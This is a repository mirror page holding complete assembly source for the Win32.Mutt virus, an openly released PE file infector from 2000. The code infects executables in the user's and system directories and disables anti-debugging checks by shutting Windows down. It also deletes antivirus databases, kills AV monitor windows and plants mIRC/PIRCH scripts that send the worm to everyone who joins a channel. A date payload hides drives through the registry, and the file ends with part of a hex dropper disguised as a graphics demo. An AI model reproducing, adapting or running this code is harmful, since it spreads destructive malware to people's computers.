mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
1307 lines
41 KiB
NASM
1307 lines
41 KiB
NASM
|
||
|
||
; Virus Name : Win32.Mutt
|
||
; Virus Version : 1.1 (not beta)
|
||
; Virus Author : ULTRAS[MATRiX]
|
||
; Release Date : 17.07.00
|
||
; Origin : Russia
|
||
; Virus type : PE infector
|
||
; Target OS : Win95, Win98, WinNT
|
||
; Target Files : PE (EXE,CPL,SCR,OCX) & mIRC and PIRCH scriptz
|
||
; Infection : Last section (i`m lazy)
|
||
; Polymorphic : No
|
||
; Encrypted : No
|
||
; Kill AV : Yes (monitor & av filez)
|
||
; Features :
|
||
; Infect PE files in current, Windows, and System dirs.
|
||
; Anti-Debugging features (DebugBreak & IsDebuggerPresent).
|
||
; Anti-Emulation features
|
||
; IRC w0rm virus: mIRC, PIRCH scripts.
|
||
; Removes many AV CRC & base files.
|
||
; Kill AV monitorz
|
||
;
|
||
; Payload : will remove the disk from the my computer using
|
||
; the registery & small messsage box - at 15 every
|
||
; month.
|
||
;
|
||
; KnownBugs : + Two mistakes are found
|
||
; - Not optimizated(i`m lazy)
|
||
;
|
||
;
|
||
; Win32.Mutt by ULTRAS [MATRiX]
|
||
|
||
.486p
|
||
.model flat,stdcall
|
||
|
||
extrn MessageBoxA:proc
|
||
extrn ExitProcess:proc
|
||
|
||
.data
|
||
_title db "[Win32.Mutt."
|
||
db all_size/01000 mod 10 + "0"
|
||
db all_size/00100 mod 10 + "0"
|
||
db all_size/00010 mod 10 + "0"
|
||
db all_size/00001 mod 10 + "0"
|
||
db "]",0
|
||
_message db "First generation host#",10
|
||
db "(c) 2000 [ULTRAS/MATRiX]",0
|
||
|
||
.code
|
||
|
||
start: push 0
|
||
push offset _title
|
||
push offset _message
|
||
push 0
|
||
call MessageBoxA
|
||
push 0
|
||
call ExitProcess
|
||
|
||
TRUE EQU 1
|
||
FALSE EQU 0
|
||
DEBUG EQU FALSE
|
||
|
||
header_s equ 60h
|
||
obj_size equ 28h
|
||
dta_size equ 22ch
|
||
|
||
vstart: db 68h
|
||
retadd dd offset start
|
||
|
||
call geteip
|
||
geteip:
|
||
mov ebp,[esp]
|
||
sub ebp,offset geteip
|
||
add esp,4
|
||
|
||
; Windoze 95/98?
|
||
|
||
mov eax,0bff70000h
|
||
cmp word ptr [eax],"ZM"
|
||
je good_os
|
||
|
||
; Windoze NT?
|
||
|
||
mov eax,077f00000h
|
||
cmp word ptr [eax],"ZM"
|
||
je good_os
|
||
|
||
;Windoze 2000?
|
||
|
||
mov eax,077e00000h
|
||
cmp word ptr [eax],"ZM"
|
||
jne error
|
||
|
||
good_os:
|
||
mov [ebp+kernel], eax ; save kernel adress
|
||
mov esi,eax
|
||
add esi,[esi+3ch]
|
||
cmp word ptr [esi], "EP" ; is it a PE?
|
||
jne @exit
|
||
mov esi,[esi+120]
|
||
add esi,eax
|
||
mov edi,[esi+36]
|
||
add edi,eax
|
||
mov [ebp+ordin_tab],edi
|
||
mov edi,[esi+32]
|
||
add edi,eax
|
||
mov [ebp+name_tab],edi
|
||
mov ecx,[esi+24]
|
||
mov esi,[esi+28]
|
||
add esi,eax
|
||
mov [ebp+adrtbl],esi
|
||
xor edx,edx
|
||
lea esi,[ebp+apiz]
|
||
mov [ebp+o_api],esi
|
||
lea eax,[ebp+win32apiz]
|
||
mov [ebp+cur_api], eax
|
||
|
||
nextz_api:
|
||
mov esi,[ebp+o_api]
|
||
mov ebx,[esi]
|
||
add ebx,ebp
|
||
mov esi,[edi]
|
||
add esi,[ebp+kernel]
|
||
|
||
cmp_apiz:
|
||
lodsb
|
||
cmp al,[ebx]
|
||
jnz not_our_API
|
||
cmp al,0
|
||
jz is_our_API
|
||
inc ebx
|
||
jmp cmp_apiz
|
||
|
||
not_our_API:
|
||
inc edx
|
||
cmp edx,ecx
|
||
jz @exit
|
||
add edi,4
|
||
mov esi,[ebp+o_api]
|
||
jmp nextz_api
|
||
|
||
is_our_API:
|
||
mov edi,[ebp+ordin_tab]
|
||
push ecx
|
||
push edx
|
||
xchg edx,eax
|
||
add eax,eax
|
||
add edi,eax
|
||
mov ax,[edi]
|
||
xor edx, edx
|
||
mov ecx,4
|
||
mul ecx
|
||
mov edi,[ebp+adrtbl]
|
||
add edi,eax
|
||
mov eax,edi
|
||
sub eax,[ebp+kernel]
|
||
mov [ebp+org_rva],eax
|
||
mov eax,[edi]
|
||
mov [ebp+org_rva_],eax
|
||
add eax,[ebp+kernel]
|
||
mov edi,[ebp+cur_api]
|
||
mov [edi],eax
|
||
add edi,4
|
||
mov [ebp+cur_api],edi
|
||
pop edx
|
||
pop ecx
|
||
mov edi,[ebp+name_tab]
|
||
mov esi,[ebp+o_api]
|
||
add esi,4
|
||
mov [ebp+o_api],esi
|
||
cmp [esi],dword ptr 0
|
||
jz found_all
|
||
mov edi,[ebp+name_tab]
|
||
xor edx,edx
|
||
jmp nextz_api
|
||
|
||
found_all:
|
||
IF DEBUG ; Anti-debugging !!
|
||
ELSE
|
||
call @Debugger
|
||
db 'IsDebuggerPresent',0 ; load IsDebuggerPresent API
|
||
|
||
; This api is not present in windoze 95
|
||
; and we should do(make) so to avoid mistakes...
|
||
|
||
@Debugger:
|
||
push [ebp+k32]
|
||
call [ebp+_GetProcAddress]
|
||
or eax,eax ; Windoze95?
|
||
jz @continue_
|
||
call eax ; call apiz
|
||
;call [ebp+_IsDebuggerPresent]
|
||
or eax,eax
|
||
jne shut_down
|
||
jmp @continue_
|
||
shut_down:
|
||
call user_32_ ; get user32.dll api
|
||
db 'USER32.DLL',00h
|
||
user_32_:
|
||
call dword ptr [ebp+_LoadLibraryA] ; load library user32.dll
|
||
call exitwindows
|
||
db 'ExitWindowsEx',00h
|
||
exitwindows:
|
||
push eax
|
||
call dword ptr [ebp+_GetProcAddress]
|
||
push 0
|
||
push 02h or 04h or 08h or 10h
|
||
;call [ebp+_ExitWindowsEx] ; close windoze
|
||
call eax
|
||
ENDIF
|
||
|
||
@continue_:
|
||
call api ; get USER32 & ADVAPI32 api
|
||
call infect_dir ; Infect Current Directory
|
||
call anti ; Anti-debugging !!
|
||
call payload ; Small&Simple Payload
|
||
call infectwindirectory ; Infect all filez in Windoze directory
|
||
call infectsysdirectory ; Infect all filez in System directory
|
||
call dr0p ; Create Virii Dropper
|
||
call kill_monitorz ; Kill AV Monitorz
|
||
error:
|
||
ret
|
||
|
||
infect:
|
||
push 0
|
||
push dword ptr [dta_+00h+ebp]
|
||
push 3
|
||
push 0
|
||
push 0
|
||
push 0C0000000h
|
||
lea eax,[dta_+2ch+ebp]
|
||
push eax
|
||
call [ebp+_CreateFileA]
|
||
cmp eax,0ffffffffh
|
||
je @exit
|
||
mov ebx, eax
|
||
|
||
push 0
|
||
push 0
|
||
push 3ch
|
||
push ebx
|
||
call [ebp+_SetFilePointer]
|
||
|
||
push 0
|
||
lea eax,[bytez+ebp]
|
||
push eax
|
||
push 2
|
||
lea eax,[header_o+ebp]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_ReadFile]
|
||
|
||
push 0
|
||
push 0
|
||
push dword ptr [header_o+ebp]
|
||
push ebx
|
||
call [ebp+_SetFilePointer]
|
||
|
||
push 0
|
||
lea eax,[bytez+ebp]
|
||
push eax
|
||
push header_s
|
||
lea eax,[headerz+ebp]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_ReadFile]
|
||
|
||
cmp dword ptr [headerz+00h+ebp],'EP' ; PE file?
|
||
jne close_file
|
||
cmp [headerz+4Ch+ebp],'ttuM' ; already infected?
|
||
je close_file
|
||
|
||
mov eax,[headerz+34h+ebp]
|
||
add eax,[headerz+28h+ebp]
|
||
mov [retadd+ebp], eax
|
||
|
||
movzx eax,word ptr [headerz+06h+ebp]
|
||
dec eax
|
||
mov ecx,40
|
||
mul ecx
|
||
add eax,18h
|
||
add ax,word ptr [headerz+14h+ebp]
|
||
add eax,[header_o+ebp]
|
||
mov [objectOfs+ebp], eax
|
||
|
||
push 0
|
||
push 0
|
||
push eax
|
||
push ebx
|
||
call [ebp+_SetFilePointer]
|
||
|
||
push 0
|
||
lea eax,[bytez+ebp]
|
||
push eax
|
||
push obj_size
|
||
lea eax,[object+ebp]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_ReadFile]
|
||
|
||
mov edx,[dta_+1ch+ebp]
|
||
mov eax,[dta_+20h+ebp]
|
||
mov ecx,[headerz+3ch+ebp]
|
||
div ecx
|
||
or edx,edx
|
||
jz $+3
|
||
inc eax
|
||
mul ecx
|
||
shl edx,16
|
||
add edx,eax
|
||
push edx
|
||
|
||
push 0
|
||
push 0
|
||
push edx
|
||
push ebx
|
||
call [ebp+_SetFilePointer]
|
||
|
||
push 0
|
||
lea eax,[bytez+ebp]
|
||
push eax
|
||
push all_size
|
||
lea eax,[vstart+ebp]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_WriteFile]
|
||
|
||
pop edx
|
||
sub edx,[object+14h+ebp]
|
||
mov [object+10h+ebp],edx
|
||
mov eax,[object+0Ch+ebp]
|
||
add eax,[object+10h+ebp]
|
||
mov [headerz+28h+ebp],eax
|
||
xor edx,edx
|
||
mov eax,all_size
|
||
mov ecx,[headerz+3Ch+ebp]
|
||
div ecx
|
||
or edx,edx
|
||
jz $+3
|
||
inc eax
|
||
mul ecx
|
||
mov edi,[object+10h+ebp]
|
||
|
||
add eax,[object+10h+ebp]
|
||
mov [object+10h+ebp],eax
|
||
xor edx,edx
|
||
mov eax,vir_size
|
||
mov ecx,[headerz+38h+ebp]
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov esi,[object+08h+ebp]
|
||
|
||
cmp esi,edi
|
||
jb x1
|
||
add eax,esi
|
||
jmp x2
|
||
x1:
|
||
add eax,edi
|
||
x2:
|
||
mov [object+08h+ebp],eax
|
||
mov [object+24h+ebp],0E0000040h
|
||
mov eax,[object+08h+ebp]
|
||
add eax,[object+0ch+ebp]
|
||
mov [headerz+50h+ebp],eax
|
||
mov [headerz+4ch+ebp],'ttuM'
|
||
|
||
push 0
|
||
push 0
|
||
push dword ptr [header_o+ebp]
|
||
push ebx
|
||
call [ebp+_SetFilePointer]
|
||
|
||
push 0
|
||
lea eax,[bytez+ebp]
|
||
push eax
|
||
push header_s
|
||
lea eax,[headerz+ebp]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_WriteFile]
|
||
|
||
push 0
|
||
push 0
|
||
push dword ptr [objectOfs+ebp]
|
||
push ebx
|
||
call [ebp+_SetFilePointer]
|
||
|
||
push 0
|
||
lea eax,[bytez+ebp]
|
||
push eax
|
||
push obj_size
|
||
lea eax,[object+ebp]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_WriteFile]
|
||
|
||
close_file:
|
||
push ebx
|
||
call [_CloseHandle+ebp]
|
||
|
||
@exit:
|
||
ret
|
||
|
||
dr0p:
|
||
pusha
|
||
push 00h
|
||
push 80h
|
||
push 02h
|
||
push 00h
|
||
push 01h
|
||
push 0C0000000h
|
||
lea eax,[ebp+dr0pz]
|
||
push eax
|
||
call [ebp+_CreateFileA]
|
||
mov ebx,eax
|
||
|
||
push 0
|
||
lea eax,[nbyte+ebp]
|
||
push eax
|
||
push size_dr0p
|
||
lea eax,[ebp+drop]
|
||
push eax
|
||
push ebx
|
||
call [ebp+_WriteFile]
|
||
|
||
push ebx
|
||
call [ebp+_CloseHandle]
|
||
|
||
lea eax,[ebp+drive_f]
|
||
push eax
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
;call infect_dir
|
||
lea ecx,[dta_+ebp]
|
||
lea edx,[dr0pz+ebp]
|
||
call infect_folder
|
||
|
||
push 00000001h or 00000002h ; set read only and hidden
|
||
lea eax,[ebp+dr0pz]
|
||
push eax
|
||
call [ebp+_SetFileAttributesA] ; set mutt.exe new attributes
|
||
popa
|
||
ret
|
||
|
||
drive_f db 'C:\',0
|
||
fhandle dd 00000000h
|
||
size_dr0p equ drop2-drop
|
||
dr0pz db "c:\Mutt.exe",0
|
||
nbyte dd ?
|
||
include dr0p.inc
|
||
|
||
|
||
|
||
payload proc
|
||
lea eax,[ebp+SYSTEMTIME]
|
||
push eax
|
||
call [ebp+_GetSystemTime]
|
||
|
||
cmp word ptr [ebp+ST_wDay],15 ; 15?
|
||
jnz no_payload ; n0? suxxx
|
||
|
||
payloadz:
|
||
|
||
; HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
|
||
|
||
lea eax,dword ptr [ebp+offset key_handle]
|
||
push eax
|
||
push KEY_SET_VALUE
|
||
push 0
|
||
lea eax,dword ptr [ebp+offset KEYZ]
|
||
push eax
|
||
push HKEY_LOCAL_MACHINE
|
||
call [ebp+_RegOpenKeyExA]
|
||
|
||
; set key Nodrives = 3
|
||
|
||
push 00000002h
|
||
lea eax,[ebp+kz_data]
|
||
push eax
|
||
push REG_SZ
|
||
push 0
|
||
lea eax,dword ptr [ebp+key_name]
|
||
push eax
|
||
mov eax,dword ptr [ebp+key_handle]
|
||
push eax
|
||
call [ebp+_RegSetValueExA]
|
||
|
||
push 00000000h
|
||
call [ebp+_RegCloseKey]
|
||
|
||
; small message & greetz
|
||
|
||
push 00001010h
|
||
lea eax,[ebp+mark_]
|
||
push eax
|
||
call _mes
|
||
|
||
db "Mutt by ULTRAS[MATRiX] (c) 2000",13,13
|
||
db "Thanx: [MATRiX] VX TeAm: mort, NBK, anaktos, Del_Armg0, Lord Dark...",13,13
|
||
db "Greetz: all VX scene",0
|
||
|
||
_mes:
|
||
push 00000000h
|
||
call [ebp+ _MessageBoxA]
|
||
no_payload:
|
||
ret
|
||
payload endp
|
||
|
||
|
||
HKEY_LOCAL_MACHINE equ 80000002h
|
||
HKEY_CURRENT_USER equ 80000001h
|
||
KEY_SET_VALUE equ 00000002h
|
||
KEYZ db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
|
||
key_handle dd 0
|
||
kz_data db "03",0h
|
||
key_name db "Nodrives",0h
|
||
REG_SZ equ 1
|
||
|
||
; DebugBreak procedure
|
||
; tnx NBK [MATRiX]
|
||
|
||
anti proc
|
||
pushad
|
||
push ebp
|
||
lea eax,[ebp+offset anti1]
|
||
push eax
|
||
push dword ptr fs:[0]
|
||
mov dword ptr fs:[0],esp
|
||
call [ebp+_DebugBreak]
|
||
jmp fuck
|
||
anti1:
|
||
mov esp,dword ptr [esp+8]
|
||
pop dword ptr fs:[0]
|
||
add esp,4
|
||
pop ebp
|
||
popad
|
||
ret
|
||
anti endp
|
||
|
||
; DiE-DiE-DiE!!!
|
||
fuck proc
|
||
mov eax,12345678h
|
||
call $
|
||
mov ecx,071h
|
||
fuck_esp:
|
||
mov dword ptr [esp],0b0b0b0b0h
|
||
add esp,4
|
||
loop fuck_esp
|
||
call $
|
||
fuck endp
|
||
|
||
mark_ db "[Win32.Mutt v1.00]",0
|
||
|
||
infect_folder proc
|
||
push ecx
|
||
;lea ecx,[dta_+ebp]
|
||
push ecx
|
||
push edx
|
||
call [_FindFirstFileA+ebp]
|
||
pop ecx
|
||
cmp eax,0ffffffffh
|
||
je endz_find
|
||
push eax
|
||
@@infect:
|
||
call infect
|
||
find_next:
|
||
pop eax
|
||
push eax
|
||
push eax
|
||
pop ecx
|
||
lea edx,[dta_+ebp]
|
||
push edx
|
||
push ecx
|
||
call [_FindNextFileA+ebp]
|
||
test eax,eax
|
||
jz find_close
|
||
lea ecx,[dta_+ebp+ebp]
|
||
jmp @@infect
|
||
find_close:
|
||
call [ebp+_FindClose]
|
||
endz_find:
|
||
ret
|
||
infect_folder endp
|
||
|
||
|
||
infectwindirectory proc
|
||
lea edx,[infection_dir_@1+ebp]
|
||
push edx
|
||
push 7Fh
|
||
push edx
|
||
call [_GetWindowsDirectoryA+ebp]
|
||
pop edx
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
call infect_dir
|
||
ret
|
||
infectwindirectory endp
|
||
|
||
infectsysdirectory proc
|
||
lea edx,[infection_dir_@2+ebp]
|
||
push edx
|
||
push 7Fh
|
||
push edx
|
||
call [_GetSystemDirectoryA+ebp]
|
||
pop edx
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
call infect_dir
|
||
ret
|
||
infectsysdirectory endp
|
||
|
||
mtx db "[MATRiX4EVER]",0
|
||
|
||
; Search&Infect current directory EXE, CPL, SCR filez..
|
||
|
||
infect_dir proc
|
||
call delete_av ; delete av filez
|
||
lea ecx,[dta_+ebp] ; find EXE filez
|
||
lea edx,[fexe+ebp]
|
||
call infect_folder ; Infect the folder
|
||
lea ecx,[dta_+ebp] ; find SCR filez
|
||
lea edx,[fscr+ebp]
|
||
call infect_folder ; Infect the folder
|
||
lea ecx,[dta_+ebp] ; find CPL filez
|
||
lea edx,[fcpl+ebp]
|
||
call infect_folder ; Infect the folder
|
||
lea ecx,[dta_+ebp] ; find OCX filez
|
||
lea edx,[focx+ebp]
|
||
call infect_folder ; Infect the folder
|
||
call irc_worm ; search mirc & pirch
|
||
ret
|
||
infect_dir endp
|
||
|
||
; Delete AV checksum & database
|
||
|
||
delete_av proc
|
||
lea ebx,[ebp+avp_crc]
|
||
call delete_
|
||
lea ebx,[ebp+anti_vir]
|
||
call delete_
|
||
lea ebx,[ebp+chklist]
|
||
call delete_
|
||
lea ebx,[ebp+ivb]
|
||
call delete_
|
||
lea ebx,[ebp+nod]
|
||
call delete_
|
||
lea ebx,[ebp+tbscan]
|
||
call delete_
|
||
lea ebx,[ebp+ap]
|
||
call delete_
|
||
ret
|
||
delete_av endp
|
||
|
||
; Delete Procedure
|
||
; EBX = filename to kill
|
||
|
||
delete_ proc
|
||
push 80h
|
||
push ebx ; set attribute
|
||
call dword ptr [ebp+_SetFileAttributesA]
|
||
push ebx
|
||
call dword ptr [ebp+_DeleteFileA] ; kill filez
|
||
ret
|
||
delete_ endp
|
||
|
||
fbytez db 05h
|
||
|
||
irc_worm:
|
||
push 80h
|
||
lea eax,[ebp+_mircfilez]
|
||
push eax
|
||
call [ebp+_SetFileAttributesA]
|
||
xchg eax,ecx
|
||
jecxz _pirch
|
||
jmp inf_mirc
|
||
_pirch:
|
||
push 80h
|
||
lea eax,[ebp+_pirchfile]
|
||
push eax
|
||
call [ebp+_SetFileAttributesA]
|
||
xchg eax,ecx
|
||
jecxz exitscp
|
||
jmp inf_pirch
|
||
exitscp:
|
||
ret
|
||
|
||
inf_pirch:
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push 00000003h
|
||
push eax
|
||
inc eax
|
||
push eax
|
||
push 40000000h
|
||
call _pirchz
|
||
_pirchfile db "events.ini",0
|
||
_pirchz:
|
||
call [ebp+_CreateFileA]
|
||
mov dword ptr [ebp+script_hnd],eax
|
||
push 00000000h
|
||
lea ebx,[ebp+fbytez]
|
||
push ebx
|
||
push p_wrmsize
|
||
lea ebx,[ebp+pirch_script]
|
||
push ebx
|
||
push eax
|
||
call [ebp+_WriteFile]
|
||
push dword ptr [ebp+script_hnd]
|
||
call [ebp+_CloseHandle]
|
||
ret
|
||
|
||
inf_mirc:
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push 00000003h
|
||
push eax
|
||
inc eax
|
||
push eax
|
||
push 0c0000000h
|
||
call _mirc
|
||
_mircfilez db "script.ini",0
|
||
_mirc:
|
||
call [ebp+_CreateFileA]
|
||
mov dword ptr [ebp+script_hnd],eax
|
||
push 00000000h
|
||
lea ebx,[ebp+fbytez]
|
||
push ebx
|
||
push m_wrmsize
|
||
lea ebx,[ebp+mirc_script]
|
||
push ebx
|
||
push eax
|
||
call [ebp+_WriteFile]
|
||
push dword ptr [ebp+script_hnd]
|
||
call [ebp+_CloseHandle]
|
||
ret
|
||
|
||
script_hnd dd 00000000h
|
||
|
||
api:
|
||
lea eax,[ebp+user32_]
|
||
push eax
|
||
call [ebp+_LoadLibraryA]
|
||
xchg eax,ebx
|
||
lea edi,[ebp+@user_api]
|
||
lea esi,[ebp+@user_add]
|
||
retrieve_user32_api:
|
||
push edi
|
||
push ebx
|
||
call [ebp+_GetProcAddress]
|
||
xchg edi,esi
|
||
stosd
|
||
xchg edi,esi
|
||
xor al,al
|
||
scasb
|
||
jnz $-1
|
||
cmp byte ptr [edi],"M"
|
||
jz user32api
|
||
jmp retrieve_user32_api
|
||
user32api:
|
||
lea eax,[ebp+advapi32_]
|
||
push eax
|
||
call [ebp+_LoadLibraryA]
|
||
xchg eax,ebx
|
||
lea edi,[ebp+@advapi32_api]
|
||
lea esi,[ebp+@advapi32_add]
|
||
retrieve_advapi32_api:
|
||
push edi
|
||
push ebx
|
||
call [ebp+_GetProcAddress]
|
||
xchg edi,esi
|
||
stosd
|
||
xchg edi,esi
|
||
xor al,al
|
||
scasb
|
||
jnz $-1
|
||
cmp byte ptr [edi],"U"
|
||
jz retz
|
||
jmp retrieve_advapi32_api
|
||
retz:
|
||
ret
|
||
|
||
|
||
kill_monitorz:
|
||
lea edi,[ebp+avmonitorz]
|
||
l00pz:
|
||
call terminate_mon
|
||
xor al,al
|
||
scasb
|
||
jnz $-1
|
||
cmp byte ptr [edi],0FFh
|
||
jnz l00pz
|
||
ret
|
||
|
||
terminate_mon proc
|
||
xor ebx,ebx
|
||
push edi
|
||
push ebx
|
||
call [ebp+_FindWindowA]
|
||
xchg eax,ecx
|
||
jecxz tm_error
|
||
push ebx
|
||
push ebx
|
||
push 00000012h
|
||
push ecx
|
||
call [ebp+_PostMessageA]
|
||
mov cl,00h
|
||
org $-1
|
||
tm_error:
|
||
stc
|
||
ret
|
||
terminate_mon endp
|
||
|
||
avmonitorz label byte
|
||
db "AVP Monitor",0
|
||
db "Amon Antivirus Monitor",0
|
||
db "AVG Control Center",0
|
||
db "Avast32 -- Rezidentn<74> podpora",0
|
||
db "AVP Monitor",0
|
||
db "Amon Antivirus Monitor",0
|
||
db "Antiv<69>rusov<6F> monitor Amon",0
|
||
db "Norton AntiVirus",0
|
||
db 0FFh
|
||
|
||
@user_add label byte
|
||
_MessageBoxA dd 00000000h
|
||
_FindWindowA dd 00000000h
|
||
_PostMessageA dd 00000000h
|
||
|
||
@advapi32_add label byte
|
||
_RegCreateKeyExA dd 00000000h
|
||
_RegOpenKeyExA dd 00000000h
|
||
_RegSetValueExA dd 00000000h
|
||
_RegCloseKey dd 00000000h
|
||
|
||
@user_api label byte
|
||
@MessageBoxA db "MessageBoxA",0
|
||
@FindWindowA db "FindWindowA",0
|
||
@PostMessageA db "PostMessageA",0
|
||
db "M"
|
||
|
||
@advapi32_api label byte
|
||
@RegCreateKeyExA db "RegCreateKeyExA",0
|
||
@RegOpenKeyExA db "RegOpenKeyExA",0
|
||
@RegSetValueExA db "RegSetValueExA",0
|
||
@RegCloseKey db "RegCloseKey",0
|
||
db "U"
|
||
; AV filez
|
||
avp_crc db 'AVP.CRC',0
|
||
anti_vir db 'ANTI-VIR.DAT',0
|
||
chklist db 'CHKLIST.MS',0
|
||
ivb db 'IVB.NTZ',0
|
||
nod db 'NOD32.000',0
|
||
tbscan db 'TBSCAN.SIG',0
|
||
ap db 'AP.VIR',0
|
||
|
||
infection_dir_@1 db 7Fh dup (00h)
|
||
infection_dir_@2 db 7Fh dup (00h)
|
||
|
||
apiz: dd offset CreateFile
|
||
dd offset SetFilePtr
|
||
dd offset ReadFile
|
||
dd offset WriteFile
|
||
dd offset CloseFile
|
||
dd offset FindFirst
|
||
dd offset FindNext
|
||
dd offset FindC
|
||
dd offset GSTime
|
||
dd offset GProcAd
|
||
dd offset LoadLib
|
||
dd offset FrLib
|
||
dd offset GetWin
|
||
dd offset GetSys
|
||
dd offset SetDir
|
||
dd offset GetDir
|
||
dd offset SetAtt
|
||
dd offset Delete
|
||
dd offset DebugB
|
||
dd 0
|
||
|
||
CreateFile db 'CreateFileA',0
|
||
SetFilePtr db 'SetFilePointer',0
|
||
ReadFile db 'ReadFile',0
|
||
WriteFile db 'WriteFile',0
|
||
CloseFile db 'CloseHandle',0
|
||
FindFirst db 'FindFirstFileA',0
|
||
FindNext db 'FindNextFileA',0
|
||
FindC db 'FindClose',0
|
||
CopyF db 'CopyFileA',0
|
||
GSTime db 'GetSystemTime',0
|
||
GProcAd db 'GetProcAddress',0 ;
|
||
LoadLib db 'LoadLibraryA',0
|
||
FrLib db 'FreeLibrary',0
|
||
GetWin db 'GetWindowsDirectoryA',0
|
||
GetSys db 'GetSystemDirectoryA',0
|
||
SetDir db 'SetCurrentDirectoryA',0
|
||
GetDir db 'GetCurrentDirectoryA',0
|
||
SetAtt db 'SetFileAttributesA',0
|
||
Delete db 'DeleteFileA',0
|
||
DebugB db 'DebugBreak',0
|
||
ExitProc db 'ExitProcess',0
|
||
|
||
|
||
win32apiz:
|
||
_CreateFileA dd 0
|
||
_SetFilePointer dd 0
|
||
_ReadFile dd 0
|
||
_WriteFile dd 0
|
||
_CloseHandle dd 0
|
||
_FindFirstFileA dd 0
|
||
_FindNextFileA dd 0
|
||
_FindClose dd 0
|
||
_GetSystemTime dd 0
|
||
_GetProcAddress dd 0
|
||
_LoadLibraryA dd 0
|
||
_FreeLibrary dd 0
|
||
_GetWindowsDirectoryA dd 0
|
||
_GetSystemDirectoryA dd 0
|
||
_SetCurrentDirectoryA dd 0
|
||
_GetCurrentDirectoryA dd 0
|
||
_SetFileAttributesA dd 0
|
||
_DeleteFileA dd 0
|
||
_DebugBreak dd 0
|
||
_ExitProcess dd 0
|
||
|
||
; Systemtime strycture
|
||
|
||
SYSTEMTIME label byte
|
||
ST_wYear dw ?
|
||
ST_wMonth dw ?
|
||
ST_wDayOfWeek dw ?
|
||
ST_wDay dw ?
|
||
ST_wHour dw ?
|
||
ST_wMinute dw ?
|
||
ST_wSecond dw ?
|
||
ST_wMilliseconds dw ?
|
||
|
||
|
||
; mIRC virus script
|
||
|
||
mirc_script db "[script]",13,10
|
||
db "; -=Mutt=-",13,10
|
||
db "n0=on 1:join:#:{",13,10
|
||
db "n1=if ( $nick == $me ) { halt } | .dcc send $nick c:\mutt.exe",13,10
|
||
db "n2=}",13,10
|
||
db "n3=ON 1:TEXT:*virus*:#:/.ignore $nick",13,10
|
||
db "n4=ON 1:TEXT:*worm*:#:/.ignore $nick",13,10
|
||
db "n5=ON 1:TEXT:*mutt*:#:/.ignore $nick",13,10
|
||
db "n6=ON 1:TEXT:*exe*:#:/.ignore $nick",13,10
|
||
db "n7=ON 1:TEXT:*blink*:#:/quit Blink 182!!!!!",13,10
|
||
db "n8=ON 1:CONNECT: {",13,10
|
||
db "n9=}",13,10
|
||
m_wrmsize equ ($-offset mirc_script)
|
||
|
||
|
||
; PIRCH virus script
|
||
|
||
pirch_script db "[Levels]",13,10
|
||
db "Enabled=1",13,10
|
||
db "; -=Mutt=-",13,10
|
||
db "Count=1",10
|
||
db "Level1=UltraMutt",13,10,13,10
|
||
db "[UltraMutt]",13,10
|
||
db "User1=*!*@*",13,10
|
||
db "UserCount=1",13,10
|
||
db "Event1=ON JOIN:#:/dcc send $nick c:\mutt.exe",13,10
|
||
db "Event2=ON TEXT:*virus*:*:/ignore $nick 1",13,10
|
||
db "Event3=ON TEXT:*worm*:*:/ignore $nick 1",13,10
|
||
db "Event4=ON TEXT:*mutt*:*:/ignore $nick 1",13,10
|
||
db "Event5=ON TEXT:*exe*:*:/ignore $nick 1",13,10
|
||
db "EventCount=5",13,10
|
||
db "[DCC]",13,10
|
||
db "AutoHideDccWin=1",13,10
|
||
p_wrmsize equ ($-offset pirch_script)
|
||
|
||
fexe db "*.EXE",0
|
||
;fult db "*.mtx",0
|
||
fscr db "*.SCR",0
|
||
fcpl db "*.CPL",0
|
||
focx db "*.OCX",0
|
||
|
||
k32 dd 0
|
||
user32_ db "USER32",0
|
||
advapi32_ db "ADVAPI32",0
|
||
all_size equ $-vstart
|
||
name_tab dd ?
|
||
adrtbl dd ?
|
||
o_api dd ?
|
||
cur_api dd ?
|
||
ordin_tab dd ?
|
||
org_rva dd ?
|
||
org_rva_ dd ?
|
||
kernel dd ?
|
||
header_o dd ?
|
||
objectOfs dd ?
|
||
SearchHandle dd ?
|
||
bytez dd ?
|
||
object dd obj_size/4 dup (?)
|
||
headerz dd header_s/4 dup (?)
|
||
dta_ dd dta_size/4 dup (?)
|
||
|
||
vir_size equ $-vstart
|
||
|
||
end vstart
|
||
|
||
|
||
--[dr0p.inc]------------------------------------------------------------------>8
|
||
|
||
; DirectDrow Demo "Plazma"
|
||
; Virus Dropper
|
||
|
||
drop:
|
||
db 04Dh,05Ah,090h,000h,003h,000h,000h,000h,004h,000h,000h,000h,0FFh,0FFh
|
||
db 000h,000h,0B8h,000h,000h,000h,000h,000h,000h,000h,040h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,0B0h,000h,000h,000h,00Eh,01Fh,0BAh,00Eh,000h,0B4h
|
||
db 009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,054h,068h,069h,073h,020h,070h
|
||
db 072h,06Fh,067h,072h,061h,06Dh,020h,063h,061h,06Eh,06Eh,06Fh,074h,020h
|
||
db 062h,065h,020h,072h,075h,06Eh,020h,069h,06Eh,020h,044h,04Fh,053h,020h
|
||
db 06Dh,06Fh,064h,065h,02Eh,00Dh,00Dh,00Ah,024h,000h,000h,000h,000h,000h
|
||
db 000h,000h,05Dh,017h,01Dh,0DBh,019h,076h,073h,088h,019h,076h,073h,088h
|
||
db 019h,076h,073h,088h,019h,076h,073h,088h,007h,076h,073h,088h,0E5h,056h
|
||
